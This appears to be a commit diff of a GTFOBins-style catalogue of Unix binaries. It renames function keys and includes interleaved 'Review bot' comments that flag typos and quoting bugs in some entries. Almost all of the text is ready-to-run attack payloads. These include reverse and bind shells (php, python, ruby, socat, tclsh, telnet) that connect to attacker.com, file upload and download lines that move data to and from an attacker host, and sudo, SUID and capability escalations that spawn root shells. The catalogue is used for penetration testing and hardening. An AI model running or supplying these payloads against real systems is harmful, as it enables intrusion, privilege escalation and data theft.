php -r '$h=@popen(getenv("CMD"),"r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
execute-non-interactive:
command:
- code: |
export CMD="id"
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open(getenv("CMD"), $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
reverse-shell-interactive:
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
php -r '$sock=fsockopen(getenv("RHOST"),getenv("RPORT"));exec("/bin/sh -i <&3 >&3 2>&3");'
upload:
file-upload:
- description: Serve files in the local folder running an HTTP server. This requires PHP version 5.4 or later.
code: |
LHOST=0.0.0.0
LPORT=8888
php -S $LHOST:$LPORT
download:
file-download:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
export LFILE=file_to_save
php -r '$c=file_get_contents(getenv("URL"));file_put_contents(getenv("LFILE"), $c);'
suid-enabled:
suid:
- code: |
CMD="/bin/sh"
./php -r "system('$CMD');"
sudo-enabled:
sudo:
- code: |
CMD="/bin/sh"
sudo php -r "system('$CMD');"
capabilities-enabled:
capabilities:
- code: |
CMD="/bin/sh"
./php -r "posix_setuid(0); system('$CMD');"


@ -1,6 +1,6 @@
---
functions:
execute-interactive:
shell:
- code: |
TF=$(mktemp)
echo 'exec sh' > $TF
@ -14,14 +14,14 @@ functions:
^O
file-read:
- code: pico file_to_read
suid-enabled:
suid:
- code: |
TF=$(mktemp)
echo 'exec sh -p' > $TF
chmod +x $TF
./pico -s $TF /etc/hosts
^T
sudo-enabled:
sudo:
- code: |
TF=$(mktemp)
echo 'exec sh' > $TF


@ -1,11 +1,11 @@
---
functions:
execute-interactive:
shell:
- code: |
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
pip install $TF
reverse-shell-interactive:
reverse-shell:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
@ -16,7 +16,7 @@ functions:
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")' > $TF/setup.py
pip install $TF
upload:
file-upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |
export URL=http://attacker.com/
@ -36,7 +36,7 @@ functions:
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()' > $TF/setup.py
pip install $TF
download:
file-download:
- description: Fetch a remote file via HTTP GET request. It needs an absolute local file path.
code: |
export URL=http://attacker.com/file_to_get
@ -60,12 +60,12 @@ functions:
TF=$(mktemp -d)
echo 'raise Exception(open("file_to_read").read())' > $TF/setup.py
pip install $TF
load-library:
library-load:
- code: |
TF=$(mktemp -d)
echo 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' > $TF/setup.py
pip install $TF
sudo-enabled:
sudo:
- code: |
TF=$(mktemp -d)
echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py


@ -1,6 +1,6 @@
---
functions:
execute-interactive:
shell:
- code: |
puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
file-write:
@ -13,7 +13,7 @@ functions:
code: |
export LFILE=file_to_read
puppet filebucket -l diff /dev/null $LFILE
sudo-enabled:
sudo:
- code: |
sudo puppet apply -e "exec { '/bin/sh -c \"exec sh -i <$(tty) >$(tty) 2>$(tty)\"': }"
---


@ -1,9 +1,9 @@
---
description: The payloads are compatible with both Python version 2 and 3.
functions:
execute-interactive:
shell:
- code: python -c 'import os; os.system("/bin/sh")'
reverse-shell-interactive:
reverse-shell:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
@ -12,7 +12,7 @@ functions:
s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))))
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]
pty.spawn("/bin/sh")'
upload:
file-upload:
- description: Send local file via "d" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.
code: |
export URL=http://attacker.com/
@ -28,7 +28,7 @@ functions:
if sys.version_info.major == 3: import http.server as s, socketserver as ss
else: import SimpleHTTPServer as s, SocketServer as ss
ss.TCPServer(("", int(e["LPORT"])), s.SimpleHTTPRequestHandler).serve_forever()'
download:
file-download:
- description: Fetch a remote file via HTTP GET request.
code: |
export URL=http://attacker.com/file_to_get
@ -41,12 +41,12 @@ functions:
- code: python -c 'open("file_to_write","w+").write("DATA")'
file-read:
- code: python -c 'print(open("file_to_read").read())'
load-library:
library-load:
- code: python -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")'
suid-enabled:
suid:
- code: ./python -c 'import os; os.system("/bin/sh -p")'
sudo-enabled:
sudo:
- code: sudo python -c 'import os; os.system("/bin/sh")'
capabilities-enabled:
capabilities:
- code: ./python -c 'import os; os.setuid(0); os.system("/bin/sh")'
---


@ -1,14 +1,14 @@
---
functions:
execute-interactive:
shell:
- code: rlwrap /bin/sh
file-write:
- description: This adds timestamps to the output file. This relies on the external `echo` command.
code: |
LFILE=file_to_write
rlwrap -l "$LFILE" echo DATA
suid-enabled:
suid:
- code: ./rlwrap -H /dev/null /bin/sh -p
sudo-enabled:
sudo:
- code: sudo rlwrap /bin/sh
---


@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: rpm --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled:
suid:
- code: ./rpm --eval '%{lua:posix.exec("/bin/sh", "-p")}'
sudo-enabled:
sudo:
- code: sudo rpm --eval '%{lua:posix.exec("/bin/sh")}'
---


@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
suid-enabled:
suid:
- code: ./rpmquery --eval '%{lua:posix.exec("/bin/sh", "-p")}'
sudo-enabled:
sudo:
- code: sudo rpmquery --eval '%{lua:posix.exec("/bin/sh")}'
---


@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
sudo-enabled:
sudo:
- code: sudo rsync -e 'sh -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
suid-enabled:
suid:
- code: ./rsync -e 'sh -p -c "sh 0<&2 1>&2"' 127.0.0.1:/dev/null
---


@ -1,19 +1,19 @@
---
functions:
execute-interactive:
shell:
- code: ruby -e 'exec "/bin/sh"'
reverse-shell-interactive:
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
ruby -rsocket -e 'exit if fork;c=TCPSocket.new(ENV["RHOST"],ENV["RPORT"]);while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
upload:
file-upload:
- description: Serve files in the local folder running an HTTP server. This requires version 1.9.2 or later.
code: |
export LPORT=8888
ruby -run -e httpd . -p $LPORT
download:
file-download:
- description: Fetch a remote file via HTTP GET request.
code: |
export RHOST=attacker.com
@ -25,10 +25,10 @@ functions:
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("DATA") }'
file-read:
- code: ruby -e 'puts File.read("file_to_read")'
load-library:
library-load:
- code: ruby -e 'require "fiddle"; Fiddle.dlopen("lib.so")'
sudo-enabled:
sudo:
- code: sudo ruby -e 'exec "/bin/sh"'
capabilities-enabled:
capabilities:
- code: ./ruby -e 'Process::Sys.setuid(0); exec "/bin/sh"'
---


@ -1,30 +1,30 @@
---
functions:
execute-interactive:
shell:
- code: |
TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
scp -S $TF x y:
upload:
file-upload:
- description: Send local file to a SSH server.
code: |
RPATH=user@attacker.com:~/file_to_save
LPATH=file_to_send
scp $LFILE $RPATH
download:
file-download:
- description: Fetch a remote file from a SSH server.
code: |
RPATH=user@attacker.com:~/file_to_get
LFILE=file_to_save
scp $RPATH $LFILE
sudo-enabled:
sudo:
- code: |
TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
chmod +x "$TF"
sudo scp -S $TF x y:
suid-limited:
limited-suid:
- code: |
TF=$(mktemp)
echo 'sh 0<&2 1>&2' > $TF
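Review bot: The `file-upload` entry runs `scp $LFILE $RPATH`, but the variable assigned two lines above is `LPATH=file_to_send`, so `$LFILE` is unset and scp receives no local source operand; it should read `scp $LPATH $RPATH` (or the assignment should be renamed to `LFILE`, matching the `file-download` entry below it). Note also that in `RPATH=user@attacker.com:~/file_to_save` the `~` follows an unquoted colon inside a variable assignment, which POSIX shells tilde-expand to the local user's home directory rather than passing it through to the remote side; quoting the value, `RPATH='user@attacker.com:~/file_to_save'`, avoids that. The `limited-suid` entry at the bottom continues past the end of the hunk.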


@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- description: GNU version only. Also, this requires `bash`.
code: sed -n '1e exec sh 1>&0' /etc/hosts
execute-non-interactive:
command:
- description: GNU version only.
code: sed -n "1e id" /etc/hosts
file-write:
@ -14,11 +14,11 @@ functions:
- code: |
LFILE=file_to_read
sed '' "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./sed -e '' "$LFILE"
sudo-enabled:
sudo:
- description: GNU version only. Also, this requires `bash`.
code: sudo sed -n '1e exec sh 1>&0 /etc/hosts
---
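Review bot: The `sudo` entry `sudo sed -n '1e exec sh 1>&0 /etc/hosts` is missing its closing single quote, so a shell reading it will keep waiting for the rest of the quoted string instead of running sed. It should mirror the `shell` entry in the first hunk: `sudo sed -n '1e exec sh 1>&0' /etc/hosts`. The key rename itself is consistent with the other files in this commit.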


@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: setarch $(arch) /bin/sh
suid-enabled:
suid:
- code: ./setarch $(arch) /bin/sh -p
sudo-enabled:
sudo:
- code: sudo setarch $(arch) /bin/sh
---


@ -1,23 +1,23 @@
---
functions:
execute-interactive:
shell:
- code: |
HOST=user@attacker.com
sftp $HOST
!/bin/sh
upload:
file-upload:
- description: Send local file to a SSH server.
code: |
RHOST=user@attacker.com
sftp $RHOST
put file_to_send file_to_save
download:
file-download:
- description: Fetch a remote file from a SSH server.
code: |
RHOST=user@attacker.com
sftp $RHOST
get file_to_get file_to_save
sudo-enabled:
sudo:
- code: |
HOST=user@attacker.com
sudo sftp $HOST


@ -5,11 +5,11 @@ functions:
- code: |
LFILE=file_to_write
shuf -e DATA -o "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_write
./shuf -e DATA -o "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_write
sudo shuf -e DATA -o "$LFILE"


@ -1,11 +1,11 @@
---
description: A valid SMB/CIFS server must be available.
functions:
execute-interactive:
shell:
- code: |
smbclient \\ip\share
!/bin/sh
sudo-enabled:
sudo:
- code: |
sudo smbclient \\ip\share
!/bin/sh
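Review bot: The share argument in `smbclient \\ip\share` (both the `shell` and the `sudo` entry) is unquoted, so the shell processes the backslashes before smbclient sees them: `\\` collapses to `\` and `\s` to `s`, leaving `\ipshare`. Quote it, `smbclient '\\ip\share'`, or use the forward-slash form `smbclient //ip/share`, which needs no escaping at all. The rename lines themselves match the new function names.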


@ -1,23 +1,23 @@
---
functions:
reverse-shell-interactive:
reverse-shell:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
bind-shell-interactive:
bind-shell:
- description: Run ``socat FILE:`tty`,raw,echo=0 TCP:target.com:12345`` on the attacker box to connect to the shell.
code: |
LPORT=12345
socat TCP-LISTEN:$LPORT,reuseaddr,fork EXEC:sh,pty,stderr,setsid,sigint,sane
sudo-enabled:
sudo:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
sudo -E socat tcp-connect:$RHOST:$RPORT exec:sh,pty,stderr,setsid,sigint,sane
suid-limited:
limited-suid:
- description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
code: |
RHOST=attacker.com


@ -4,11 +4,11 @@ functions:
- code: |
LFILE=file_to_read
sort -m "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./sort -m "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo sort -m "$LFILE"


@ -1,6 +1,6 @@
---
functions:
execute-interactive:
shell:
- code: sqlite3 /dev/null '.shell /bin/sh'
file-write:
- code: |
@ -14,8 +14,8 @@ functions:
.import $LFILE t
SELECT * FROM t;
EOF
sudo-enabled:
sudo:
- code: sudo sqlite3 /dev/null '.shell /bin/sh'
suid-limited:
limited-suid:
- code: "./sqlite3 /dev/null '.shell /bin/sh'"
---


@ -1,18 +1,18 @@
---
functions:
execute-interactive:
shell:
- description: Reconnecting may help bypassing restricted shells.
code: ssh localhost $SHELL --noprofile --norc
- description: Spawn interactive shell through ProxyCommand option.
code: ssh -o ProxyCommand=';sh 0<&2 1>&2' x
upload:
file-upload:
- description: Send local file to a SSH server.
code: |
HOST=user@attacker.com
RPATH=file_to_save
LPATH=file_to_send
ssh $HOST "cat > $RPATH" < $LPATH
download:
file-download:
- description: Fetch a remote file from a SSH server.
code: |
HOST=user@attacker.com
@ -24,7 +24,7 @@ functions:
code: |
LFILE=file_to_read
ssh -F $LFILE localhost
sudo-enabled:
sudo:
- description: Spawn interactive root shell through ProxyCommand option.
code: sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x
---


@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: stdbuf -i0 /bin/sh
suid-enabled:
suid:
- code: ./stdbuf -i0 /bin/sh -p
sudo-enabled:
sudo:
- code: sudo stdbuf -i0 /bin/sh
---


@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: strace -o /dev/null /bin/sh
suid-enabled:
suid:
- code: ./strace -o /dev/null /bin/sh -p
sudo-enabled:
sudo:
- code: sudo strace -o /dev/null /bin/sh
---


@ -4,11 +4,11 @@ functions:
- code: |
LFILE=file_to_read
tail -c1G "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./tail -c1G "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo tail -c1G "$LFILE"


@ -1,8 +1,8 @@
---
functions:
execute-interactive:
shell:
- code: tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
execute-non-interactive:
command:
- description: This only works for GNU tar.
code: tar xf /dev/null -I '/bin/sh -c "id 1>&2"'
file-write:
@ -17,8 +17,8 @@ functions:
code: |
LFILE=file_to_read
tar xf "$LFILE" -I '/bin/sh -c "cat 1>&2"'
sudo-enabled:
sudo:
- code: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
suid-limited:
limited-suid:
- code: ./tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh
---


@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: taskset 1 /bin/sh
suid-enabled:
suid:
- code: ./taskset 1 /bin/sh -p
sudo-enabled:
sudo:
- code: sudo taskset 1 /bin/sh
---


@ -1,20 +1,20 @@
---
functions:
execute-interactive:
shell:
- code: |
tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr
reverse-shell-non-interactive:
non-interactive-reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
export RHOST=attacker.com
export RPORT=12345
echo 'set s [socket $::env(RHOST) $::env(RPORT)];while 1 { puts -nonewline $s "> ";flush $s;gets $s c;set e "exec $c";if {![catch {set r [eval $e]} err]} { puts $s $r }; flush $s; }; close $s;' | tclsh
suid-enabled:
suid:
- code: |
./tclsh
exec /bin/sh -p <@stdin >@stdout 2>@stderr
sudo-enabled:
sudo:
- code: |
sudo tclsh
exec /bin/sh <@stdin >@stdout 2>@stderr


@ -1,14 +1,14 @@
---
description: These require some traffic to be actually captured. Also note that the subprocess is immediately sent to the background.
functions:
execute-non-interactive:
command:
- code: |
COMMAND='id'
TF=$(mktemp)
echo "$COMMAND" > $TF
chmod +x $TF
tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF
sudo-enabled:
sudo:
- code: |
COMMAND='id'
TF=$(mktemp)


@ -5,11 +5,11 @@ functions:
- code: |
LFILE=file_to_write
echo DATA | ./tee -a "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_write
echo DATA | ./tee -a "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_write
echo DATA | sudo tee -a "$LFILE"
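Review bot: The first entry, `echo DATA | ./tee -a "$LFILE"`, invokes `./tee` by relative path, which elsewhere in this commit is the form used only for the `suid` entries where a copied binary is run from the current directory; the plain entry should use the binary from PATH, `echo DATA | tee -a "$LFILE"`, as the `sudo` entry does. As written, the first entry and the `suid` entry two lines below are byte-identical. The function key of that first entry sits above the hunk, so it is presumably the `file-write` entry seen in the comparable files.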


@ -1,6 +1,6 @@
---
functions:
execute-interactive:
shell:
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com
@ -8,14 +8,14 @@ functions:
telnet $RHOST $RPORT
^]
!/bin/sh
reverse-shell-interactive:
reverse-shell:
- description: Run `nc -l -p 12345` on the attacker box to receive the shell.
code: |
RHOST=attacker.com
RPORT=12345
TF=$(mktemp -u)
mkfifo $TF && telnet $RHOST $RPORT 0<$TF | /bin/sh 1>$TF
sudo-enabled:
sudo:
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com
@ -23,7 +23,7 @@ functions:
sudo telnet $RHOST $RPORT
^]
!/bin/sh
suid-limited:
limited-suid:
- description: BSD version only. Needs to be connected first.
code: |
RHOST=attacker.com


@ -1,24 +1,24 @@
---
functions:
upload:
file-upload:
- description: Send local file to a TFTP server.
code: |
RHOST=attacker.com
tftp $RHOST
put file_to_send
download:
file-download:
- description: Fetch a remote file from a TFTP server.
code: |
RHOST=attacker.com
tftp $RHOST
get file_to_get
suid-enabled:
suid:
- description: Send local file to a TFTP server.
code: |
RHOST=attacker.com
./tftp $RHOST
put file_to_send
sudo-enabled:
sudo:
- description: Send local file to a TFTP server.
code: |
RHOST=attacker.com


@ -1,10 +1,10 @@
---
description: Note that the shell might have its own builtin time implementation, which may behave differently than` /usr/bin/time`, hence the absolute path.
functions:
execute-interactive:
shell:
- code: /usr/bin/time /bin/sh
suid-enabled:
suid:
- code: ./time /bin/sh -p
sudo-enabled:
sudo:
- code: sudo /usr/bin/time /bin/sh
---
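Review bot: The description has a misplaced backtick, `differently than` /usr/bin/time`, which renders as a stray backtick followed by an unformatted path; it should read `` differently than `/usr/bin/time` ``. The rename lines below it are consistent with the other files.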


@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: timeout 7d /bin/sh
suid-enabled:
suid:
- code: ./timeout 7d /bin/sh -p
sudo-enabled:
sudo:
- code: sudo timeout --foreground 7d /bin/sh
---


@ -5,11 +5,11 @@ functions:
- code: |
LFILE=file_to_read
ul "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./ul "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo ul "$LFILE"


@ -4,11 +4,11 @@ functions:
- code: |
LFILE=file_to_read
unexpand -t99999999 "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./unexpand -t99999999 "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo unexpand -t99999999 "$LFILE"


@ -5,11 +5,11 @@ functions:
- code: |
LFILE=file_to_read
uniq "$LFILE"
suid-enabled:
suid:
- code: |
LFILE=file_to_read
./uniq "$LFILE"
sudo-enabled:
sudo:
- code: |
LFILE=file_to_read
sudo uniq "$LFILE"


@ -1,9 +1,9 @@
---
functions:
execute-interactive:
shell:
- code: unshare /bin/sh
suid-enabled:
suid:
- code: ./unshare -r /bin/sh
sudo-enabled:
sudo:
- code: sudo unshare /bin/sh
---
